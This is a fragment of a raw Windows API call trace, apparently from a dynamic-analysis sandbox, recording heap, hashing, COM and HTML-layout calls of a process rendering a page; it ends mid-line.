[0161.097] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d95b8 | out: hHeap=0x5e0000) returned 1 [0161.097] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dc8e0 [0161.097] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a18 [0161.097] HashData (in: pbData=0x9ee6d00, cbData=0x1, pbHash=0x197604, cbHash=0x2 | out: pbHash=0x197604) returned 0x0 [0161.097] HashData (in: pbData=0x19761c, cbData=0x4, pbHash=0x197604, cbHash=0x2 | out: pbHash=0x197604) returned 0x0 [0161.097] HashData (in: pbData=0x9ee6d04, cbData=0x4, pbHash=0x197620, cbHash=0x2 | out: pbHash=0x197620) returned 0x0 [0161.097] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d00 | out: hHeap=0x5e0000) returned 1 [0161.097] GetFocus () returned 0x103e2 [0161.097] GetFocus () returned 0x103e2 [0161.097] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.097] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.098] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.098] GetFocus () returned 0x103e2 [0161.098] GetFocus () returned 0x103e2 [0161.098] GetFocus () returned 0x103e2 [0161.098] GetFocus () returned 0x103e2 [0161.098] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.098] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.099] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.099] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.099] LsSetDoc () returned 0x0 [0161.099] LsCreateLine () returned 0x0 [0161.099] LsQueryLineDup () returned 0x0 [0161.099] LsDestroyLine () returned 0x0 [0161.099] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.099] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.099] GetFocus () returned 0x103e2 [0161.099] GetFocus () returned 0x103e2 [0161.100] LsdnFinishRegular () returned 0x0 [0161.100] LsQueryLineDup () returned 0x0 [0161.100] IOleInPlaceFrame:SetMenu (This=0xd0f360, hmenuShared=0x1004, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.100] LsQueryLineCpPpoint () returned 0x0 [0161.100] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.100] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.100] LsDestroyLine () returned 0x0 [0161.101] IOleInPlaceSite:CanInPlaceActivate (This=0xcfaee0) returned 0x0 [0161.101] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.101] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.101] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.101] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.101] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.101] LsDestroyLine () returned 0x0 [0161.102] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.102] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.102] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0161.103] GetProcAddress (hModule=0x65d00000, lpProcName=0x2) returned 0x65d02610 [0161.103] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19920c | out: lpflOldProtect=0x19920c*=0x4) returned 1 [0161.103] LsDestroyContext () returned 0x0 [0161.104] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef9498 | out: hHeap=0x5e0000) returned 1 [0161.104] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8488 | out: hHeap=0x5e0000) returned 1 [0161.104] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef95b0 | out: hHeap=0x5e0000) returned 1 [0161.104] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7f18 | out: hHeap=0x5e0000) returned 1 [0161.104] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9778 | out: hHeap=0x5e0000) returned 1 [0161.104] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d98e0 | out: hHeap=0x5e0000) returned 1 [0161.104] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2e60 | out: hHeap=0x5e0000) returned 1 [0161.105] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db358 | out: hHeap=0x5e0000) returned 1 [0161.105] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9c00 | out: hHeap=0x5e0000) returned 1 [0161.105] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9a20 | out: hHeap=0x5e0000) returned 1 [0161.105] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9908 | out: hHeap=0x5e0000) returned 1 [0161.105] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9c28 | out: hHeap=0x5e0000) returned 1 [0161.105] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef98a0 | out: hHeap=0x5e0000) returned 1 [0161.106] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef9ca8 | out: hHeap=0x5e0000) returned 1 [0161.106] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67b610 | out: hHeap=0x5e0000) returned 1 [0161.106] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efbb88 | out: hHeap=0x5e0000) returned 1 [0161.106] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efbde0 | out: hHeap=0x5e0000) returned 1 [0161.106] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efbf18 | out: hHeap=0x5e0000) returned 1 [0161.106] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64b0a0 | out: hHeap=0x5e0000) returned 1 [0161.106] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efc2b0 | out: hHeap=0x5e0000) returned 1 [0161.106] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ce408 | out: hHeap=0x5e0000) returned 1 [0161.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc820 | out: hHeap=0x5e0000) returned 1 [0161.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f8320 | out: hHeap=0x5e0000) returned 1 [0161.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9708 | out: hHeap=0x5e0000) returned 1 [0161.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efc878 | out: hHeap=0x5e0000) returned 1 [0161.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efc540 | out: hHeap=0x5e0000) returned 1 [0161.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64ba60 | out: hHeap=0x5e0000) returned 1 [0161.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efc6e0 | out: hHeap=0x5e0000) returned 1 [0161.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68d180 | out: hHeap=0x5e0000) returned 1 [0161.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efc448 | out: hHeap=0x5e0000) returned 1 [0161.107] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efc030 | out: hHeap=0x5e0000) returned 1 [0161.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9efa490 | out: hHeap=0x5e0000) returned 1 [0161.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef8e20 | out: hHeap=0x5e0000) returned 1 [0161.108] LsDestroyContext () returned 0x0 [0161.108] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d0018 | out: hHeap=0x5e0000) returned 1 [0161.109] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7f48 | out: hHeap=0x5e0000) returned 1 [0161.109] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd2b8 | out: hHeap=0x5e0000) returned 1 [0161.110] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d81e8 | out: hHeap=0x5e0000) returned 1 [0161.110] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5be0 | out: hHeap=0x5e0000) returned 1 [0161.110] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5cf8 | out: hHeap=0x5e0000) returned 1 [0161.110] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d2920 | out: hHeap=0x5e0000) returned 1 [0161.110] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db748 | out: hHeap=0x5e0000) returned 1 [0161.110] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9c50 | out: hHeap=0x5e0000) returned 1 [0161.110] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64cf68 | out: hHeap=0x5e0000) returned 1 [0161.110] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d97c8 | out: hHeap=0x5e0000) returned 1 [0161.110] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9bd8 | out: hHeap=0x5e0000) returned 1 [0161.111] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9f50 | out: hHeap=0x5e0000) returned 1 [0161.111] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6de630 | out: hHeap=0x5e0000) returned 1 [0161.111] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x67b048 | out: hHeap=0x5e0000) returned 1 [0161.111] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdbc0 | out: hHeap=0x5e0000) returned 1 [0161.111] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd5a8 | out: hHeap=0x5e0000) returned 1 [0161.111] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6da358 | out: hHeap=0x5e0000) returned 1 [0161.112] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64b8c0 | out: hHeap=0x5e0000) returned 1 [0161.112] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef85d8 | out: hHeap=0x5e0000) returned 1 [0161.112] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ce488 | out: hHeap=0x5e0000) returned 1 [0161.112] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dcae0 | out: hHeap=0x5e0000) returned 1 [0161.112] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f7e90 | out: hHeap=0x5e0000) returned 1 [0161.112] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9648 | out: hHeap=0x5e0000) returned 1 [0161.112] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef8ba0 | out: hHeap=0x5e0000) returned 1 [0161.112] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef8868 | out: hHeap=0x5e0000) returned 1 [0161.112] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x64b990 | out: hHeap=0x5e0000) returned 1 [0161.112] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef8a08 | out: hHeap=0x5e0000) returned 1 [0161.113] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68cd60 | out: hHeap=0x5e0000) returned 1 [0161.113] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef8770 | out: hHeap=0x5e0000) returned 1 [0161.113] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6da470 | out: hHeap=0x5e0000) returned 1 [0161.113] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdcd8 | out: hHeap=0x5e0000) returned 1 [0161.113] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddfb8 | out: hHeap=0x5e0000) returned 1 [0161.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9618 [0161.114] HashData (in: pbData=0x6d9618, cbData=0x1, pbHash=0x199e60, cbHash=0x2 | out: pbHash=0x199e60) returned 0x0 [0161.114] HashData (in: pbData=0x199e5c, cbData=0x4, pbHash=0x199e68, cbHash=0x2 | out: pbHash=0x199e68) returned 0x0 [0161.114] HashData (in: pbData=0x6d961c, cbData=0xc, pbHash=0x199e64, cbHash=0x2 | out: pbHash=0x199e64) returned 0x0 [0161.114] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9618 | out: hHeap=0x5e0000) returned 1 [0161.114] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9708 [0161.114] HashData (in: pbData=0x6d9708, cbData=0x1, pbHash=0x199e60, cbHash=0x2 | out: pbHash=0x199e60) returned 0x0 [0161.114] HashData (in: pbData=0x199e5c, cbData=0x4, pbHash=0x199e68, cbHash=0x2 | out: pbHash=0x199e68) returned 0x0 [0161.114] HashData (in: pbData=0x6d970c, cbData=0xc, pbHash=0x199e64, cbHash=0x2 | out: pbHash=0x199e64) returned 0x0 [0161.114] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9708 | out: hHeap=0x5e0000) returned 1 [0161.115] MulDiv (nNumber=442, nNumerator=100, nDenominator=100) returned 442 [0161.115] MulDiv (nNumber=256, nNumerator=100, nDenominator=100) returned 256 [0161.115] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2c0 | out: lpPerformanceCount=0x19a2c0*=3097993441128) returned 1 [0161.117] SetEvent (hEvent=0x304) returned 1 [0161.117] IUnknown:AddRef (This=0x6cb500) returned 0x2 [0161.117] IUnknown:Release (This=0x6cb500) returned 0x1 [0161.118] RevokeBindStatusCallback (pBC=0x6c8c18, pBSCb=0xd45110) returned 0x0 [0161.118] IUnknown:Release (This=0xd45118) returned 0x2 [0161.118] IUnknown:Release (This=0xd45110) returned 0x1 [0161.118] IUnknown:AddRef (This=0x6c8c18) returned 0x3 [0161.118] IUnknown:Release (This=0x6c8c18) returned 0x2 [0161.118] IUnknown:Release (This=0x6c8c18) returned 0x1 [0161.118] IUnknown:Release (This=0x6cb500) returned 0x0 [0161.118] IInternetProtocol:UnlockRequest (This=0xd5c22c) returned 0x0 [0161.118] IUnknown:Release (This=0xd5c22c) returned 0x1 [0161.118] IUnknown:Release (This=0x9ef1630) returned 0x1 [0161.118] IUnknown:Release (This=0xd5c210) returned 0x0 [0161.119] GetProcessHeap () returned 0x5e0000 [0161.119] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bcb70 | out: hHeap=0x5e0000) returned 1 [0161.119] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3b10 | out: hHeap=0x5e0000) returned 1 [0161.119] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d30 | out: hHeap=0x5e0000) returned 1 [0161.119] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef3958 | out: hHeap=0x5e0000) returned 1 [0161.119] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db670 | out: hHeap=0x5e0000) returned 1 [0161.120] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef65c0 | out: hHeap=0x5e0000) returned 1 [0161.120] IUnknown:Release (This=0x9ee0784) returned 0x4 [0161.120] IUnknown:Release (This=0x9ee0784) returned 0x3 [0161.120] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dc880 | out: hHeap=0x5e0000) returned 1 [0161.120] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef38b8 | out: hHeap=0x5e0000) returned 1 [0161.120] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db280 | out: hHeap=0x5e0000) returned 1 [0161.121] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6db2c8 | out: hHeap=0x5e0000) returned 1 [0161.122] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.122] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.122] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.122] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.123] StrChrW (lpStart="accesskey", wMatch=0x3a) returned 0x0 [0161.123] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.123] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4) returned 0x9ee6d30 [0161.123] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.123] StrChrW (lpStart="type", wMatch=0x3a) returned 0x0 [0161.123] StrChrW (lpStart="style", wMatch=0x3a) returned 0x0 [0161.123] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.123] IsCharSpaceW (wch=0x66) returned 0 [0161.123] IsCharAlphaNumericW (ch=0x3a) returned 0 [0161.123] IsCharSpaceW (wch=0x3a) returned 0 [0161.123] IsCharAlphaNumericW (ch=0x3a) returned 0 [0161.124] IsCharSpaceW (wch=0x20) returned 1 [0161.124] IsCharSpaceW (wch=0x6d) returned 0 [0161.124] IsCharAlphaNumericW (ch=0x20) returned 0 [0161.124] IsCharSpaceW (wch=0x20) returned 1 [0161.124] IsCharSpaceW (wch=0x73) returned 0 [0161.124] IsCharAlphaNumericW (ch=0x20) returned 0 [0161.124] IsCharSpaceW (wch=0x20) returned 1 [0161.124] IsCharSpaceW (wch=0x73) returned 0 [0161.124] IsCharAlphaNumericW (ch=0x3b) returned 0 [0161.124] IsCharSpaceW (wch=0x3b) returned 0 [0161.124] IsCharAlphaNumericW (ch=0x3b) returned 0 [0161.124] IsCharSpaceW (wch=0x20) returned 1 [0161.124] IsCharSpaceW (wch=0x66) returned 0 [0161.124] IsCharSpaceW (wch=0x66) returned 0 [0161.124] IsCharSpaceW (wch=0x6d) returned 0 [0161.124] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1c) returned 0x6d9a70 [0161.124] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.124] IsCharAlphaNumericW (ch=0x3a) returned 0 [0161.125] IsCharSpaceW (wch=0x3a) returned 0 [0161.125] IsCharAlphaNumericW (ch=0x3a) returned 0 [0161.125] IsCharSpaceW (wch=0x20) returned 1 [0161.125] IsCharSpaceW (wch=0x38) returned 0 [0161.126] IsCharAlphaNumericW (ch=0x38) returned 1 [0161.126] IsCharAlphaNumericW (ch=0x3b) returned 0 [0161.126] IsCharSpaceW (wch=0x3b) returned 0 [0161.126] IsCharAlphaNumericW (ch=0x3b) returned 0 [0161.126] IsCharSpaceW (wch=0xd) returned 1 [0161.126] IsCharSpaceW (wch=0xa) returned 1 [0161.126] IsCharSpaceW (wch=0x77) returned 0 [0161.126] IsCharSpaceW (wch=0x74) returned 0 [0161.126] IsCharSpaceW (wch=0x38) returned 0 [0161.126] IsCharSpaceW (wch=0x38) returned 0 [0161.126] IsCharSpaceW (wch=0x74) returned 0 [0161.126] IsCharSpaceW (wch=0x38) returned 0 [0161.126] IsCharSpaceW (wch=0x70) returned 0 [0161.126] IsCharSpaceW (wch=0x74) returned 0 [0161.126] IsCharSpaceW (wch=0x0) returned 0 [0161.127] IsCharAlphaNumericW (ch=0x3a) returned 0 [0161.127] IsCharSpaceW (wch=0x3a) returned 0 [0161.127] IsCharAlphaNumericW (ch=0x3a) returned 0 [0161.127] IsCharSpaceW (wch=0x20) returned 1 [0161.127] IsCharSpaceW (wch=0x33) returned 0 [0161.127] IsCharAlphaNumericW (ch=0x33) returned 1 [0161.127] IsCharAlphaNumericW (ch=0x2e) returned 0 [0161.127] IsCharSpaceW (wch=0x2e) returned 0 [0161.127] IsCharAlphaNumericW (ch=0x2e) returned 0 [0161.127] IsCharAlphaNumericW (ch=0x38) returned 1 [0161.127] IsCharAlphaNumericW (ch=0x3b) returned 0 [0161.127] IsCharSpaceW (wch=0x3b) returned 0 [0161.129] IsCharAlphaNumericW (ch=0x3b) returned 0 [0161.129] IsCharSpaceW (wch=0x20) returned 1 [0161.129] IsCharSpaceW (wch=0x68) returned 0 [0161.129] IsCharSpaceW (wch=0x6d) returned 0 [0161.129] IsCharSpaceW (wch=0x33) returned 0 [0161.129] IsCharSpaceW (wch=0x33) returned 0 [0161.129] IsCharSpaceW (wch=0x6d) returned 0 [0161.130] IsCharSpaceW (wch=0x33) returned 0 [0161.130] IsCharSpaceW (wch=0x65) returned 0 [0161.130] IsCharSpaceW (wch=0x6d) returned 0 [0161.130] IsCharSpaceW (wch=0x0) returned 0 [0161.130] IsCharAlphaNumericW (ch=0x3a) returned 0 [0161.130] IsCharSpaceW (wch=0x3a) returned 0 [0161.130] IsCharAlphaNumericW (ch=0x3a) returned 0 [0161.130] IsCharSpaceW (wch=0x20) returned 1 [0161.130] IsCharSpaceW (wch=0x32) returned 0 [0161.130] IsCharAlphaNumericW (ch=0x32) returned 1 [0161.130] IsCharAlphaNumericW (ch=0x2e) returned 0 [0161.130] IsCharSpaceW (wch=0x2e) returned 0 [0161.130] IsCharAlphaNumericW (ch=0x2e) returned 0 [0161.130] IsCharAlphaNumericW (ch=0x32) returned 1 [0161.130] IsCharAlphaNumericW (ch=0x0) returned 0 [0161.130] IsCharSpaceW (wch=0x6d) returned 0 [0161.130] IsCharSpaceW (wch=0x32) returned 0 [0161.130] IsCharSpaceW (wch=0x32) returned 0 [0161.130] IsCharSpaceW (wch=0x6d) returned 0 [0161.130] IsCharSpaceW (wch=0x32) returned 0 [0161.130] IsCharSpaceW (wch=0x65) returned 0 [0161.130] IsCharSpaceW (wch=0x6d) returned 0 [0161.131] IsCharSpaceW (wch=0x0) returned 0 [0161.131] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6c20 [0161.131] StrChrW (lpStart="ID", wMatch=0x3a) returned 0x0 [0161.131] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dcb00 [0161.131] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.131] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.131] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.132] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.132] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0161.132] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dcaa0 [0161.132] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.132] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.132] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.133] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.133] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.133] memcpy_s (in: _Destination=0x6c5e48, _DestinationSize=0x1e18, _Source=0x9ee6964, _SourceSize=0x2 | out: _Destination=0x6c5e48) returned 0x0 [0161.133] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.133] memcpy_s (in: _Destination=0x6c5e4c, _DestinationSize=0x1e14, _Source=0x9ee696e, _SourceSize=0x2 | out: _Destination=0x6c5e4c) returned 0x0 [0161.133] memcpy_s (in: _Destination=0x199c18, _DestinationSize=0x200, _Source=0x9ee6970, _SourceSize=0x2 | out: _Destination=0x199c18) returned 0x0 [0161.133] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.133] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.137] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.138] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.138] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x6c5c60, Size=0x1fc) returned 0x6c5c60 [0161.138] IUnknown:Release (This=0x5fc930) returned 0x5 [0161.138] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ef1a40 | out: hHeap=0x5e0000) returned 1 [0161.138] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee7e00 | out: hHeap=0x5e0000) returned 1 [0161.140] IUnknown:Release (This=0x68e73c) returned 0xe [0161.141] IUnknown:Release (This=0x68e73c) returned 0xd [0161.141] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6df0 | out: hHeap=0x5e0000) returned 1 [0161.142] IUnknown:Release (This=0x68e73c) returned 0xc [0161.142] IUnknown:Release (This=0x68e73c) returned 0xb [0161.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee4068 | out: hHeap=0x5e0000) returned 1 [0161.142] IUnknown:Release (This=0x68e73c) returned 0xa [0161.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8b68 | out: hHeap=0x5e0000) returned 1 [0161.142] IUnknown:Release (This=0x68e73c) returned 0x9 [0161.142] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee2050 | out: hHeap=0x5e0000) returned 1 [0161.142] IUnknown:Release (This=0x68e73c) returned 0x8 [0161.177] IUnknown:Release (This=0x68e73c) returned 0x7 [0161.177] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8b88 | out: hHeap=0x5e0000) returned 1 [0161.177] IUnknown:Release (This=0x6ce708) returned 0x0 [0161.177] IUnknown:Release (This=0x6d87ec) returned 0x1 [0161.178] IUnknown:Release (This=0x6d87f0) returned 0x0 [0161.178] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d87e8 | out: hHeap=0x5e0000) returned 1 [0161.178] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ca5f0 | out: hHeap=0x5e0000) returned 1 [0161.178] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5e60 | out: hHeap=0x5e0000) returned 1 [0161.178] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5ee728 | out: hHeap=0x5e0000) returned 1 [0161.178] GetCurrentThreadId () returned 0xb48 [0161.178] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9eefe10 | out: hHeap=0x5e0000) returned 1 [0161.178] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee5078 | out: hHeap=0x5e0000) returned 1 [0161.179] SetEvent (hEvent=0x308) returned 1 [0161.179] QueryPerformanceCounter (in: lpPerformanceCount=0x19a31c | out: lpPerformanceCount=0x19a31c*=3097999834111) returned 1 [0161.179] QueryPerformanceCounter (in: lpPerformanceCount=0x19a2ec | out: lpPerformanceCount=0x19a2ec*=3097999840807) returned 1 [0161.180] QueryPerformanceCounter (in: lpPerformanceCount=0x19a21c | out: lpPerformanceCount=0x19a21c*=3097999864551) returned 1 [0161.180] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.180] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.180] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.180] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.180] SetEvent (hEvent=0x304) returned 1 [0161.181] QueryPerformanceCounter (in: lpPerformanceCount=0xd11de0 | out: lpPerformanceCount=0xd11de0*=3097999972955) returned 1 [0161.181] GetCurrentThreadId () returned 0xb48 [0161.181] GetCurrentThreadId () returned 0xb48 [0161.181] GetCurrentThreadId () returned 0xb48 [0161.181] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d93d8 [0161.181] HashData (in: pbData=0x6d93d8, cbData=0x1, pbHash=0x199e60, cbHash=0x2 | out: pbHash=0x199e60) returned 0x0 [0161.181] HashData (in: pbData=0x199e5c, cbData=0x4, pbHash=0x199e68, cbHash=0x2 | out: pbHash=0x199e68) returned 0x0 [0161.181] HashData (in: pbData=0x6d93dc, cbData=0xc, pbHash=0x199e64, cbHash=0x2 | out: pbHash=0x199e64) returned 0x0 [0161.181] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d93d8 | out: hHeap=0x5e0000) returned 1 [0161.181] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d93d8 [0161.181] HashData (in: pbData=0x6d93d8, cbData=0x1, pbHash=0x199e60, cbHash=0x2 | out: pbHash=0x199e60) returned 0x0 [0161.181] HashData (in: pbData=0x199e5c, cbData=0x4, 